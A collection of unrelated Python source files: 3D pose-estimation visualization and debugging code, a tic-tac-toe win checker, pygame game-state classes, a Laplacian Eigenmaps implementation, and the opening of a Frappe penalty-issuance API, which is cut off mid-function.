0, 1, 0,
normalize=True,
color='black',
linestyle='--'
)
axis.quiver(
0, 0, 0,
0, 0, 1,
normalize=True,
color='black',
linestyle='--'
)
coord_lim = 1.0
axis.set_xlim3d(-coord_lim, coord_lim)
axis.set_ylim3d(-coord_lim, coord_lim)
axis.set_zlim3d(-coord_lim, coord_lim)
axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def viz_se_smooth():
def smooth(threshold, alpha, beta):
def _f(x):
x[x > threshold] = np.power(
x[x > threshold],
alpha
) * (threshold ** beta) # soft version
return x
return _f
n_points = 100
xs = np.linspace(0, 2e2, n_points)
threshold = 1e2
_, axis = get_figa(1, 1, heigth=12, width=30)
for alpha in np.linspace(0.1, 0.3, 2):
for beta in np.linspace(0.9, 1.5, 3):
ys = smooth(threshold, alpha, beta)(xs.copy())
axis.plot(
xs, ys,
label='smoothed (alpha={:.1f}, beta={:.1f})'.format(alpha, beta)
)
axis.plot(xs, xs, label='MSE (original)')
axis.vlines(x=threshold, ymin=0, ymax=np.max(
xs), linestyle=':', label='threshold')
axis.set_xlim((xs[0], xs[-1]))
axis.set_yscale('log')
axis.legend(loc='upper left')
axis.set_xlabel('original loss')
plt.tight_layout()
plt.show()
def viz_berhu():
def berhu(c):
def _f(x):
out = x.copy()
out[np.abs(x) <= c] = np.abs(out[np.abs(x) <= c])
out[np.abs(x) > c] = (np.square(out[np.abs(x) > c]) + np.square(c)) / (2*c)
return out
return _f
xs = np.linspace(-5, 5, 1000)
_, axis = get_figa(1, 1, heigth=12, width=30)
for c in np.linspace(0.5, 2.5, 4):
ys = berhu(c)(xs)
axis.plot(
xs, ys,
label='berHu (threshold={:.3f})'.format(c)
)
axis.plot(
xs, np.square(xs),
'--',
label='L2',
)
axis.plot(
xs, np.abs(xs),
'--',
label='L1',
)
axis.set_xlim((xs[0], xs[-1]))
axis.legend(loc='upper left')
plt.tight_layout()
plt.show()
def viz_huber():
def huber(c):
def _f(x):
out = x.copy()
out[np.abs(x) <= c] = np.square(out[np.abs(x) <= c]) * 0.5
out[np.abs(x) > c] = c * (np.abs(out[np.abs(x) > c]) - 0.5 * c)
return out
return _f
xs = np.linspace(-5, 5, 1000)
_, axis = get_figa(1, 1, heigth=12, width=30)
for c in np.linspace(0.5, 2.5, 4):
ys = huber(c)(xs)
axis.plot(
xs, ys,
label='berHu (threshold={:.3f})'.format(c)
)
axis.plot(
xs, np.square(xs),
'--',
label='L2',
)
axis.plot(
xs, np.abs(xs),
'--',
label='L1',
)
axis.set_xlim((xs[0], xs[-1]))
axis.legend(loc='upper left')
plt.tight_layout()
plt.show()
def get_joints_connections():
return [
(6, 3), # pelvis -> left anca
(3, 4), # left anca -> left knee
(4, 5), # left knee -> left foot
(6, 2), # pelvis -> right anca
(2, 1), # right anca -> right knee
(1, 0), # right knee -> right foot
(6, 7), # pelvis -> back
(7, 8), # back -> neck
(8, 9), # neck -> head
(9, 16), # head -> nose
(8, 13), # neck -> shoulder
(13, 14), # shoulder -> arm
(14, 15), # arm -> hand
(8, 12), # neck -> shoulder
(12, 11), # shoulder -> arm
(11, 10) # arm -> hand
]
def get_joints_index(joint_name):
indices = {
'pelvis': 6,
'head': 9,
'left anca': 3,
'left knee': 4,
'left foot': 5,
'right anca': 2,
'right knee': 1,
'right foot': 0,
}
return indices[joint_name]
def is_vip(joint_i):
vips = map(
get_joints_index,
['pelvis']
)
return joint_i in vips
def draw_kps_in_2d(axis, keypoints_2d, label, marker='o', color='blue'):
for _, joint_pair in enumerate(get_joints_connections()):
joints = [
keypoints_2d[joint_pair[0]],
keypoints_2d[joint_pair[1]]
]
xs = joints[0][0], joints[1][0]
ys = joints[0][1], joints[1][1]
axis.plot(
xs, ys,
marker=marker,
markersize=0 if label else 10,
color=color,
)
if label:
xs = keypoints_2d[:, 0]
ys = keypoints_2d[:, 1]
n_points = keypoints_2d.shape[0]
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, n_points))
for point_i in range(n_points):
if is_vip(point_i):
marker, s = 'x', 100
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ],
marker=marker,
s=s,
color=color,
label=label + ' {:.0f}'.format(point_i)
)
else:
marker, s = 'o', 10
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ],
marker=marker,
s=s,
color=colors[point_i]
)
def draw_kps_in_3d(axis, keypoints_3d, label=None, marker='o', color='blue'):
for joint_pair in get_joints_connections():
joints = [
keypoints_3d[joint_pair[0]],
keypoints_3d[joint_pair[1]]
]
xs = joints[0][0], joints[1][0]
ys = joints[0][1], joints[1][1]
zs = joints[0][2], joints[1][2]
axis.plot(
xs, ys, zs,
marker=marker,
markersize=0 if label else 5,
color=color,
)
if label:
xs = keypoints_3d[:, 0]
ys = keypoints_3d[:, 1]
zs = keypoints_3d[:, 2]
n_points = keypoints_3d.shape[0]
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, n_points))
for point_i in range(n_points):
if is_vip(point_i):
marker, s = 'x', 100
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ], [ zs[point_i] ],
marker=marker,
s=s,
color=color,
label=label
)
else:
marker, s = 'o', 10
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ], [ zs[point_i] ],
marker=marker,
s=s,
color=colors[point_i]
)
print(label, 'centroid ~', keypoints_3d.mean(axis=0))
print(label, 'pelvis ~', keypoints_3d[get_joints_index('pelvis')])
def compare_in_world(try2align=True, scaling=False, force_pelvis_in_origin=True, show_metrics=True):
def _f(axis, gt, pred):
if try2align:
pred = apply_umeyama(
gt.unsqueeze(0),
pred.unsqueeze(0),
scaling=scaling
)[0]
if force_pelvis_in_origin:
pred = pred - pred[PELVIS_I].unsqueeze(0).repeat(17, 1)
gt = gt - gt[PELVIS_I].unsqueeze(0).repeat(17, 1)
draw_kps_in_3d(
axis, gt.detach().cpu().numpy(), label='gt',
marker='o', color='blue'
)
draw_kps_in_3d(
axis, pred.detach().cpu().numpy(), label='pred',
marker='^', color='red'
)
if show_metrics:
criterion = KeypointsMSESmoothLoss(threshold=20*20)
loss = criterion(pred.unsqueeze(0), gt.unsqueeze(0))
print(
'loss ({}) = {:.3f}'.format(
str(criterion), loss
)
)
per_pose_error_relative = torch.sqrt(
((gt - pred) ** 2).sum(1)
).mean(0)
print(
'MPJPE (relative 2 pelvis) = {:.3f} mm'.format(
per_pose_error_relative
)
)
return _f
def viz_experiment_samples():
def load_data(config, dumps_folder):
def _load(file_name):
f_path = dumps_folder / file_name
return torch.load(f_path).cpu().numpy()
keypoints_3d_gt = _load('kps_world_gt.trc') # see `cam2cam:_save_stuff`
keypoints_3d_pred = _load('kps_world_pred.trc')
indices = None # _load('batch_indexes.trc')
_, val_dataloader, _ = setup_dataloaders(config, distributed_train=False) # ~ 0 seconds
return keypoints_3d_gt, keypoints_3d_pred, indices, val_dataloader
def get_dump_folder(milestone, experiment):
tesi_folder = Path('~/Scuola/now/thesis').expanduser()
milestones = tesi_folder / 'milestones'
current_milestone = milestones / milestone
folder = 'human36m_alg_AlgebraicTriangulationNet@{}'.format(experiment)
return current_milestone / folder / 'epoch-0-iter-0'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--milestone', type=str, required=True,
help='milestone name, e.g "20.05_27.05_rodrigezzzzzzzzzz"'
)
parser.add_argument(
'--exp', type=str, required=True,
help='experiment name, e.g "25.05.2021-18:58:36")'
)
return parser.parse_args()
args = parse_args()
milestone, experiment_name = args.milestone, args.exp
config = get_config('experiments/human36m/train/human36m_alg.yaml')
dumps_folder = get_dump_folder(milestone, experiment_name)
gts, pred, _, dataloader = load_data(config, dumps_folder)
per_pose_error_relative, per_pose_error_absolute, _ = dataloader.dataset.evaluate(
pred,
split_by_subject=True,
keypoints_gt_provided=gts,
) # (average 3D MPJPE (relative to pelvis), all MPJPEs)
message = 'MPJPE relative to pelvis: {:.1f} mm, absolute: {:.1f} mm'.format(
per_pose_error_relative,
per_pose_error_absolute
) # just a little bit of live debug
print(message)
max_plots = 6
n_samples = gts.shape[0]
n_plots = min(max_plots, n_samples)
samples_to_show = np.random.permutation(np.arange(n_samples))[:n_plots]
print('found {} samples but plotting {}'.format(n_samples, n_plots))
fig = plt.figure(figsize=plt.figaspect(1.5))
fig.set_facecolor('white')
for i, sample_i in enumerate(samples_to_show):
axis = fig.add_subplot(2, 3, i + 1, projection='3d')
compare_in_world(
try2align=True,
scaling=False,
force_pelvis_in_origin=True,
show_metrics=True
)(
axis,
torch.FloatTensor(gts[sample_i]),
torch.FloatTensor(pred[sample_i])
)
print(
'sample #{} (#{}): pelvis predicted @ ({:.1f}, {:.1f}, {:.1f})'.format(
i,
sample_i,
pred[sample_i, 6, 0],
pred[sample_i, 6, 1],
pred[sample_i, 6, 2],
)
)
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def viz_2ds():
keypoints_2d = torch.tensor([
[[ 4.8415e-01, 2.1003e+00],
[-2.7001e-02, 1.1663e+00],
[-2.8865e-01, -8.5847e-02],
[ 2.9798e-01, 8.8624e-02],
[-1.7468e-01, 1.3790e+00],
[-5.6043e-01, 2.6243e+00],
[ 0.0000e+00, 0.0000e+00],
[ 7.6863e-02, -6.8167e-01],
[ 5.9208e-02, -1.4519e+00],
[ 2.5522e-02, -1.9191e+00],
[-4.1919e-01, -5.3182e-01],
[-5.2262e-01, -5.5556e-01],
[-2.4472e-01, -1.2919e+00],
[ 4.3363e-01, -1.3549e+00],
[ 1.0899e+00, -8.9900e-01],
[ 9.7792e-01, -1.4139e+00],
[ 1.3063e-03, -1.6318e+00]],
[[ 2.3046e+00, 1.0602e+00],
[ 1.2328e+00, 5.0544e-01],
[-6.0097e-02, 2.6153e-01],
[ 6.0097e-02, -2.6153e-01],
[ 1.3166e+00, -2.2383e-01],
[ 2.5585e+00, -9.4359e-02],
[ 0.0000e+00, 0.0000e+00],
[-6.7088e-01, -5.7899e-04],
[-1.4296e+00, -7.1418e-02],
[-1.8864e+00, -1.3718e-01],
[-5.4844e-01, -3.7660e-01],
[-5.2444e-01, 3.4245e-01],
[-1.2682e+00, 1.5023e-01],
[-1.3374e+00, -2.3499e-01],
[-9.0852e-01, -5.3400e-01],
[-1.4061e+00, -1.0684e+00],
[-1.6061e+00, -3.3483e-01]],
])
_, axis = get_figa(1, 1, heigth=10, width=5)
colors = list(mcolors.TABLEAU_COLORS.values())
for view_i, color in zip(range(keypoints_2d.shape[0]), colors):
kps = keypoints_2d[view_i]
if view_i == 0:
kps = (torch.eye(2) * -1).matmul(kps.view(2, 17)).view(17, 2)
norm = torch.norm(kps, p='fro') * 1e2
label = 'view #{:0d} norm={:.2f}'.format(view_i, norm)
draw_kps_in_2d(axis, kps.cpu().numpy(), label=label, color=color)
#axis.set_ylim(axis.get_ylim()[::-1]) # invert
axis.legend(loc='lower right')
plt.tight_layout()
plt.show()
# todo refactor
def plot_vector(axis, vec, from_origin=True, color='black'):
if from_origin:
axis.quiver(
0, 0, 0,
*vec,
normalize=False,
length=1e3,
color=color
)
else:
axis.quiver(
*vec,
0, 0, 0,
normalize=False,
length=1e3,
color=color
)
def debug_live_training():
K = build_intrinsics(
translation=(0, 0),
f=(1e2, 1e2),
shear=0
)
cam_pred = torch.tensor([
[[-4.2443e-01, -7.4665e-01, -5.1222e-01, 0.0000e+00],
[ 2.4692e-01, -6.3970e-01, 7.2788e-01, 0.0000e+00],
[-8.7114e-01, 1.8246e-01, 4.5588e-01, 1.5252e+05]],
[[ 7.5974e-01, -3.0468e-01, 5.7442e-01, -3.4799e+03],
[-1.5405e-01, 7.7392e-01, 6.1426e-01, -3.7902e+03],
[-6.3171e-01, -5.5517e-01, 5.4104e-01, 2.1839e+03]],
[[ 7.3524e-01, -3.2578e-01, 5.9437e-01, -3.8283e+03],
[-1.2664e-01, 7.9545e-01, 5.9265e-01, -3.6438e+03],
[-6.6587e-01, -5.1101e-01, 5.4359e-01, 2.1683e+03]],
[[ 7.2222e-01, -3.5045e-01, 5.9630e-01, -3.6894e+03],
[-1.0154e-01, 7.9907e-01, 5.9260e-01, -3.6506e+03],
[-6.8417e-01, -4.8854e-01, 5.4152e-01, 2.0948e+03]]
]).float()
cam_gt = torch.tensor([
[[-9.2829e-01, 3.7185e-01, 6.5016e-04, 5.6843e-14],
[ 1.0662e-01, 2.6784e-01, -9.5755e-01, 0.0000e+00],
[-3.5624e-01, -8.8881e-01, -2.8828e-01, 5.5426e+03]],
[[-7.3154e-01, 1.7293e-01, -6.5950e-01, 3.6554e+03],
[-2.1223e-01, 8.6149e-01, 4.6130e-01, -2.5568e+03],
[ 6.4792e-01, 4.7743e-01, -5.9351e-01, 9.0016e+03]],
[[ 7.6961e-01, -1.3799e-01, 6.2342e-01, -3.4554e+03],
[ 1.2878e-01, 9.8985e-01, 6.0114e-02, -3.3319e+02],
[-6.2539e-01, 3.4022e-02, 7.7957e-01, 1.3629e+03]],
[[-9.9562e-01, -9.1829e-02, -1.7330e-02, 9.6054e+01],
[-8.3708e-02, 7.9393e-01, 6.0222e-01, -3.3379e+03],
[-4.1542e-02, 6.0103e-01, -7.9814e-01, 8.9065e+03]]
]).float()
pred = torch.tensor([
[ -160.3910, -769.9235, -321.0890],
[ -266.9682, -311.4738, -160.7710],
[ -456.6614, 182.6224, 201.5943],
[ -357.4164, 145.4103, 475.0630],
[ -487.4498, -225.8628, 514.1423],
[ -547.2083, -1039.7829, -34.5466],
[ 0.0000, 0.0000, 0.0000],
[ -241.1220, 298.0778, 383.7975],
[ -194.8609, 582.7874, 498.8811],
[ -83.1367, 828.0535, 480.5881],
[ -110.3319, 190.7841, 393.7511],
[ -644.9359, 316.2966, 211.1616],
[ -432.4880, 358.7843, 582.5133],
[ -281.9765, 413.0376, 217.3509],
[ -183.0061, 203.4561, 4.5386],
[ -235.3027, 138.4676, 75.6848],
[ -455.3205, 513.7687, 459.1732]
]).float()
gt = torch.tensor([
[ -79.5401, -636.6202, -37.0452],
[ -80.1006, -342.1938, 287.2476],
[-134.9715, 8.6331, 13.0857],
[ 134.9714, -8.6331, -13.0857],
[ 123.5578, -341.4131, 287.5503],
[ 132.1298, -641.1887, -31.6872],
[ 0.0000, 0.0000, 0.0000],
[ 51.0227, 177.0769, 131.2592],
[ 106.6453, 294.1788, 351.3190],
[ 84.2807, 248.4880, 481.9431],
[-230.4554, 277.3011, -61.3511],
[-153.6896, 433.7529, 114.1089],
[ -23.4383, 343.8069, 339.6841],
[ 245.7708, 285.6294, 341.7256],
[ 396.1953, 433.1156, 164.0866],
[ 430.9688, 338.0313, -61.5378],
[ 67.0051, 198.7636, 379.6946]
]).float()
def _compare_in_camspace(try2align=True, scaling=False, force_pelvis_in_origin=False, from_master=None):
def _get_Rt(cams, cam_i, from_master):
if not (from_master is None):
master = torch.vstack([
cams[from_master],
torch.tensor([0, 0, 0, 1])
]) # ~ 4 x 4, to allow inverse
full = torch.mm(
torch.vstack([
cams[cam_i],
torch.tensor([0, 0, 0, 1])
]),
torch.inverse(master)
)
return full[:3, :3], full[:3, 3]
else:
return cams[cam_i, :3, :3], cams[cam_i, :3, 3]
def _f(axis, cam_i, cam_gt, cam_pred, gt, pred):
R, t = _get_Rt(cam_gt, cam_i, from_master)
cam = Camera(R, t, K)
in_cam = cam.world2cam()(gt.detach().cpu())
if force_pelvis_in_origin:
in_cam = in_cam - in_cam[PELVIS_I].unsqueeze(0).repeat(17, 1)
draw_kps_in_3d(
axis, in_cam.detach().cpu().numpy(), label='gt',
marker='^', color='blue'
)
R, t = _get_Rt(cam_pred, cam_i, from_master)
cam = Camera(R, t, K)
other_in_cam = cam.world2cam()(pred.detach().cpu())
if force_pelvis_in_origin:
other_in_cam = other_in_cam - other_in_cam[PELVIS_I].unsqueeze(0).repeat(17, 1)
if try2align:
other_in_cam = apply_umeyama(
in_cam.unsqueeze(0),
other_in_cam.unsqueeze(0),
scaling=scaling
)[0]
draw_kps_in_3d(
axis, other_in_cam.detach().cpu().numpy(), label='pred',
marker='^', color='red'
)
return _f
def _compare_in_proj(axis, cam_i, norm=False):
def _plot(cam, kps, label, color):
in_proj = cam.world2proj()(kps.detach().cpu())
if norm:
in_proj /= torch.norm(in_proj, p='fro')
draw_kps_in_2d(
axis, in_proj.cpu().numpy(), label=label, color=color
)
print(in_proj[3:9])
return in_proj # just for debugging
cam = Camera(
cam_gt[cam_i, :3, :3],
cam_gt[cam_i, :3, 3],
K
)
_plot(cam, gt, 'gt', 'blue')
cam = Camera(
cam_pred[cam_i, :3, :3],
cam_pred[cam_i, :3, 3],
K
)
_plot(cam, pred, 'pred', 'red')
def _plot_cam_config(axis, gt, pred):
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, len(pred)))
locs = get_cam_location_in_world(pred)
axis.scatter(
locs[:, 0], locs[:, 1], locs[:, 2],
marker='o',
s=600,
)
# for i, loc in enumerate(locs):
# axis.scatter(
# [ loc[0] ], [ loc[1] ], [ loc[2] ],
# marker='o',
# s=600,
# color=colors[i],
# label='pred cam #{:.0f}'.format(i)
# )
# plot_vector(axis, loc, from_origin=False)
# locs = get_cam_location_in_world(cam_gt)
# for i, loc in enumerate(locs):
# axis.scatter(
# [ loc[0] ], [ loc[1] ], [ loc[2] ],
# marker='x',
# s=600,
# color=colors[i],
# label='GT cam #{:.0f}'.format(i)
# )
# plot_vector(axis, loc, from_origin=False)
plot_vector(axis, [1, 0, 0]) # X
plot_vector(axis, [0, 1, 0]) # Y
plot_vector(axis, [0, 0, 1]) # Z
#axis.legend()
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1, projection='3d')
compare_in_world(
try2align=False,
scaling=False,
force_pelvis_in_origin=True,
show_metrics=True
)(axis, gt, pred)
# _compare_in_camspace(
# try2align=True,
# scaling=False,
# force_pelvis_in_origin=True,
# from_master=0
# )(axis, 1, cam_gt, cam_pred, gt, pred)
#axis = fig.add_subplot(1, 1, 1)
#_compare_in_proj(axis, cam_i=0, norm=False)
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def debug_noisy_kps():
pred = torch.tensor([[-2.4766e+00, 1.3749e+02],
[ 5.1553e+00, 6.4850e+01],
[ 2.0758e+01, -5.5261e+00],
[-2.1199e+01, 5.6435e+00],
[-2.6096e+01, 6.9830e+01],
[-2.7770e+01, 1.4269e+02],
[-7.5650e-16, 8.0752e-15],
[-1.5507e+01, -2.8643e+01],
[-3.7743e+01, -4.8863e+01],
[-3.7260e+01, -6.8515e+01],
[-4.3409e+01, -4.1714e+01],
[-1.0379e+01, -2.9870e+01],
[-1.2607e+01, -4.6328e+01],
[-5.6277e+01, -4.2062e+01],
[-7.1047e+01, 3.4976e+00],
[-4.0396e+01, 3.5121e+01],
[-4.1566e+01, -5.1796e+01]])
gt = torch.tensor([[ -4.2729, 135.4911],
[ 7.2749, 65.5788],
[ 20.6505, -8.0638],
[-22.5586, 5.5275],
[-30.7718, 69.5852],
[-28.9555, 139.2640],
[ -0.5923, -3.4187],
[-15.7863, -32.1939],
[-35.3697, -47.2574],
[-41.1945, -67.7720],
[-46.1246, -44.4364],
[-13.1253, -29.5808],
[-13.6145, -43.1209],
[-54.4943, -42.5870],
[-71.2272, 4.1981],
[-41.6380, 34.4177],
[-40.1495, -48.8374]])
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1)
draw_kps_in_2d(axis, pred.detach().cpu().numpy(), label='gt', marker='^', color='red')
draw_kps_in_2d(axis, gt.detach().cpu().numpy(), label='gt', marker='o', color='blue')
axis.set_ylim(axis.get_ylim()[::-1]) # invert
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
if __name__ == '__main__':
debug_live_training()
#debug_noisy_kps()
#viz_experiment_samples()
#viz_2ds()
#viz_geodesic()
#viz_berhu()
#viz_huber()
#viz_se_smooth()
|
#!/usr/bin/env python3
"""
Author : qianying
Date : 2019-04-03
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
# --------------------------------------------------
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'positional', metavar='STATE', help='A positional argument')
return parser.parse_args()
# --------------------------------------------------
def warn(msg):
"""Print a message to STDERR"""
print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
"""warn() and exit with error"""
warn(msg)
sys.exit(1)
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
pos_arg = args.positional
passing_re = re.compile('[XO.]{9}')
if not passing_re.match(pos_arg):
print('State "{}" must be 9 characters of only ., X, O'.format(pos_arg))
sys.exit(0)
wins = [('X', 'XXX......'), ('O', 'OOO......'), ('X', '...XXX...'),
('O', '...OOO...'), ('X', '......XXX'), ('O', '......OOO'),
('X', 'X..X..X..'), ('O', 'O..O..O..'), ('X', '.X..X..X.'),
('O', '.O..O..O.'), ('X', '..X..X..X'), ('O', '..O..O..O'),
('X', 'X...X...X'), ('O', 'O...O...O'), ('X', '..X.X.X..'),
('O', '..O.O.O..')]
for winner, state in wins:
if re.match(state, pos_arg):
print('{} has won'.format(winner))
sys.exit(0)
print('No winner')
# --------------------------------------------------
if __name__ == '__main__':
main()
|
import pygame
class Action:
packet_name = None
network_command = False
data_required = True
def __init__(self, data=None, target_id=None):
# target_id is the id of the player to send this packet to
if not self.packet_name:
raise TypeError("packet_name not initialized")
if not isinstance(self.network_command, bool):
raise TypeError("network_command should be boolean")
if data is not None and not isinstance(data, dict):
raise TypeError("Data should be dictionary")
if self.data_required and data is None:
raise TypeError("Data should not be empty in this packet")
self.data = data or {}
self.target_id = target_id
def toJSON(self):
return {"packet": self.packet_name,
"data": self.data}
def run(self, GameState):
"""
Command run in the client
"""
pass
def run_server(self, GameState):
"""
Command run when server receives this action
"""
pass
class GameState:
"""
This is the store in the Flux architecture
"""
def __init__(self):
self.clock = pygame.time.Clock()
def attach_engine(self, engine):
self.engine = engine
def run_action(self, action):
self.engine.apply(action)
def update(self):
self.clock.tick(60)
def draw(self, screen):
pass
|
#####################################
# Fast spectral decomposition and Laplacian Eigenmaps
# Author: Davi Sidarta-Oliveira
# School of Medical Sciences,University of Campinas,Brazil
# contact: davisidarta[at]gmail.com
######################################
import numpy as np
import pandas as pd
from scipy import sparse
from fastlapmap.similarities import fuzzy_simplicial_set_ann, cknn_graph, diffusion_harmonics
def LapEigenmap(data,
n_eigs=10,
k=10,
metric='euclidean',
efC=20,
efS=20,
M=10,
similarity='diffusion',
n_jobs=1,
norm_laplacian=True,
eigen_tol=10e-4,
return_evals=False,
p=11/16,
verbose=False):
"""
Performs [Laplacian Eigenmaps](https://www2.imm.dtu.dk/projects/manifold/Papers/Laplacian.pdf) on the input data.
----------
Parameters
----------
`data` : numpy.ndarray, pandas.DataFrame or scipy.sparse.csr_matrix Input data. By default will use nmslib for
approximate nearest-neighbors, which works both on numpy arrays and sparse matrices (faster and cheaper option).
Alternatively, users can provide a precomputed affinity matrix by stating `metric='precomputed'`.
`n_eigs` : int (optional, default 10).
Number of eigenvectors to decompose the graph Laplacian into.
`k` : int (optional, default 10).
Number of k-nearest-neighbors to use when computing affinities.
`metric` : str (optional, default 'euclidean').
which metric to use when computing neighborhood distances. Defaults to 'euclidean'.
Accepted metrics include:
-'sqeuclidean'
-'euclidean'
-'l1'
-'lp' - requires setting the parameter `p` - equivalent to minkowski distance
-'cosine'
-'angular'
-'negdotprod'
-'levenshtein'
-'hamming'
-'jaccard'
-'jansen-shan'
`M` : int (optional, default 10).
defines the maximum number of neighbors in the zero and above-zero layers during HSNW
(Hierarchical Navigable Small World Graph). However, the actual default maximum number
of neighbors for the zero layer is 2*M. A reasonable range for this parameter
is 5-100. For more information on HSNW, please check https://arxiv.org/abs/1603.09320.
HSNW is implemented in python via NMSlib. Please check more about NMSlib at https://github.com/nmslib/nmslib.
`efC` : int (optional, default 20).
A 'hnsw' parameter. Increasing this value improves the quality of a constructed graph
and leads to higher accuracy of search. However this also leads to longer indexing times.
A reasonable range for this parameter is 10-500.
`efS` : int (optional, default 100).
A 'hnsw' parameter. Similarly to efC, increasing this value improves recall at the
expense of longer retrieval time. A reasonable range for this parameter is 10-500.
`n_jobs` : int (optional, default 1)
How many threads to use in approximate-nearest-neighbors computation.
`similarity` : str (optional, default 'diffusion').
Which algorithm to use for similarity learning. Options are diffusion harmonics ('diffusion')
, fuzzy simplicial sets ('fuzzy') and continuous k-nearest-neighbors ('cknn').
`norm_laplacian` : bool (optional, default True).
Whether to renormalize the graph Laplacian.
`return_evals` : bool (optional, default False).
Whether to also return the eigenvalues in a tuple of eigenvectors, eigenvalues. Defaults to False.
`verbose` : bool (optional, default False).
Whether to report information on the current progress of the algorithm.
----------
Returns
----------
* If return_evals is True :
A tuple of eigenvectors and eigenvalues.
* If return_evals is False :
An array of ranked eigenvectors.
"""
if isinstance(data, np.ndarray):
data = sparse.csr_matrix(data)
elif isinstance(data, pd.DataFrame):
data = data.to_numpy()
data = sparse.csr_matrix(data)
elif isinstance(data, sparse.csr_matrix):
pass
else:
return print('Data should be a numpy.ndarray,pandas.DataFrame or'
'a scipy.sparse.csr_matrix for obtaining approximate nearest neighbors with \'nmslib\'.')
if metric != 'precomputed':
if similarity == 'diffusion':
W = diffusion_harmonics(data, n_neighbors=k, metric=metric, efC=efC, efS=efS, M=M, p=p, n_jobs=n_jobs, verbose=verbose)
elif similarity == 'fuzzy':
fuzzy_results = fuzzy_simplicial_set_ann(data, n_neighbors=k, metric=metric, efC=efC, efS=efS, M=M, p=p, n_jobs=n_jobs, verbose=verbose)
W = fuzzy_results[0]
elif similarity == 'cknn':
W = cknn_graph(data, n_neighbors=k, metric=metric, n_jobs=n_jobs, efC=efC, efS=efS, M=M, include_self=True, is_sparse=True, return_adj=False)
# Enforce symmetry
W = (W + W.T) / 2
laplacian, dd = sparse.csgraph.laplacian(W, normed=norm_laplacian,
return_diag=True)
laplacian = _set_diag(laplacian, 1, norm_laplacian)
laplacian *= -1
n_eigs = n_eigs + 1
evals, evecs = sparse.linalg.eigsh(laplacian, k=n_eigs, which='LM', sigma=1.0, tol=eigen_tol)
evecs = evecs.T[n_eigs::-1]
if norm_laplacian:
# recover u = D^-1/2 x from the eigenvector output x
evecs = evecs / dd
evecs = evecs[1:n_eigs].T
if return_evals:
return evecs, evals
else:
return evecs
def _set_diag(laplacian, value, norm_laplacian):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition.
Parameters
----------
laplacian : {ndarray, sparse matrix}
The graph laplacian.
value : float
The value of the diagonal.
norm_laplacian : bool
Whether the value of the diagonal should be changed or not.
Returns
-------
laplacian : {array, sparse matrix}
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
# We need all entries in the diagonal to values
if not sparse.isspmatrix(laplacian):
if norm_laplacian:
laplacian.flat[:: n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
if norm_laplacian:
diag_idx = laplacian.row == laplacian.col
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices coming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
|
import frappe, base64
from frappe.utils import cint
from one_fm.legal.doctype.penalty_issuance.penalty_issuance import get_filtered_employees
from one_fm.legal.doctype.penalty.penalty import send_email_to_legal, upload_image
from one_fm.one_fm.page.face_recognition.face_recognition import recognize_face
from frappe import _
import pickle, face_recognition
import json
from one_fm.api.v1.utils import response
@frappe.whitelist()
def get_employee_list(shift: str = None, penalty_occurence_time: str = None) -> dict:
if not shift:
return response("Bad Request", 400, None, "shift required.")
if not penalty_occurence_time:
return response("Bad Request", 400, None, "penalty_ocurrence_time required.")
if not isinstance(shift, str):
return response("Bad Request", 400, None, "shift must be of type str.")
if not isinstance(penalty_occurence_time, str):
return response("Bad Request", 400, None, "penalty_ocurrence_time must be of type str.")
try:
result = get_filtered_employees(shift, penalty_occurence_time, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalty_types():
""" This method gets the list of penalty types. """
try:
result = frappe.db.sql("""SELECT name, penalty_name_arabic FROM `tabPenalty Type` """, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_all_shifts():
try:
result = frappe.db.sql("""SELECT osh.name, osh.site, osh.project, ost.site_location
FROM `tabOperations Shift` osh, `tabOperations Site` ost
WHERE osh.site=ost.name
ORDER BY name ASC """, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def issue_penalty(penalty_category, issuing_time, issuing_location, penalty_location, penalty_occurence_time,company_damage, customer_property_damage, asset_damage, other_damages, shift=None, site=None, project=None, site_location=None, penalty_employees=[], penalty_details=[]):
try:
employee, employee_name, designation = frappe.get_value("Employee", {"user_id": frappe.session.user}, ["name","employee_name", "designation"])
penalty_issuance = frappe.new_doc("Penalty Issuance")
penalty_issuance.penalty_category = penalty_category
penalty_issuance.issuing_time = issuing_time
penalty_issuance.location = issuing_location
penalty_issuance.penalty_location = penalty_location
penalty_issuance.penalty_occurence_time = penalty_occurence_time
penalty_issuance.issuing_employee = employee
penalty_issuance.employee_name = employee_name
penalty_issuance.designation = designation
penalty_issuance.customer_property_damage = cint(customer_property_damage)
penalty_issuance.company_damage = cint(company_damage)
penalty_issuance.other_damages = cint(other_damages)
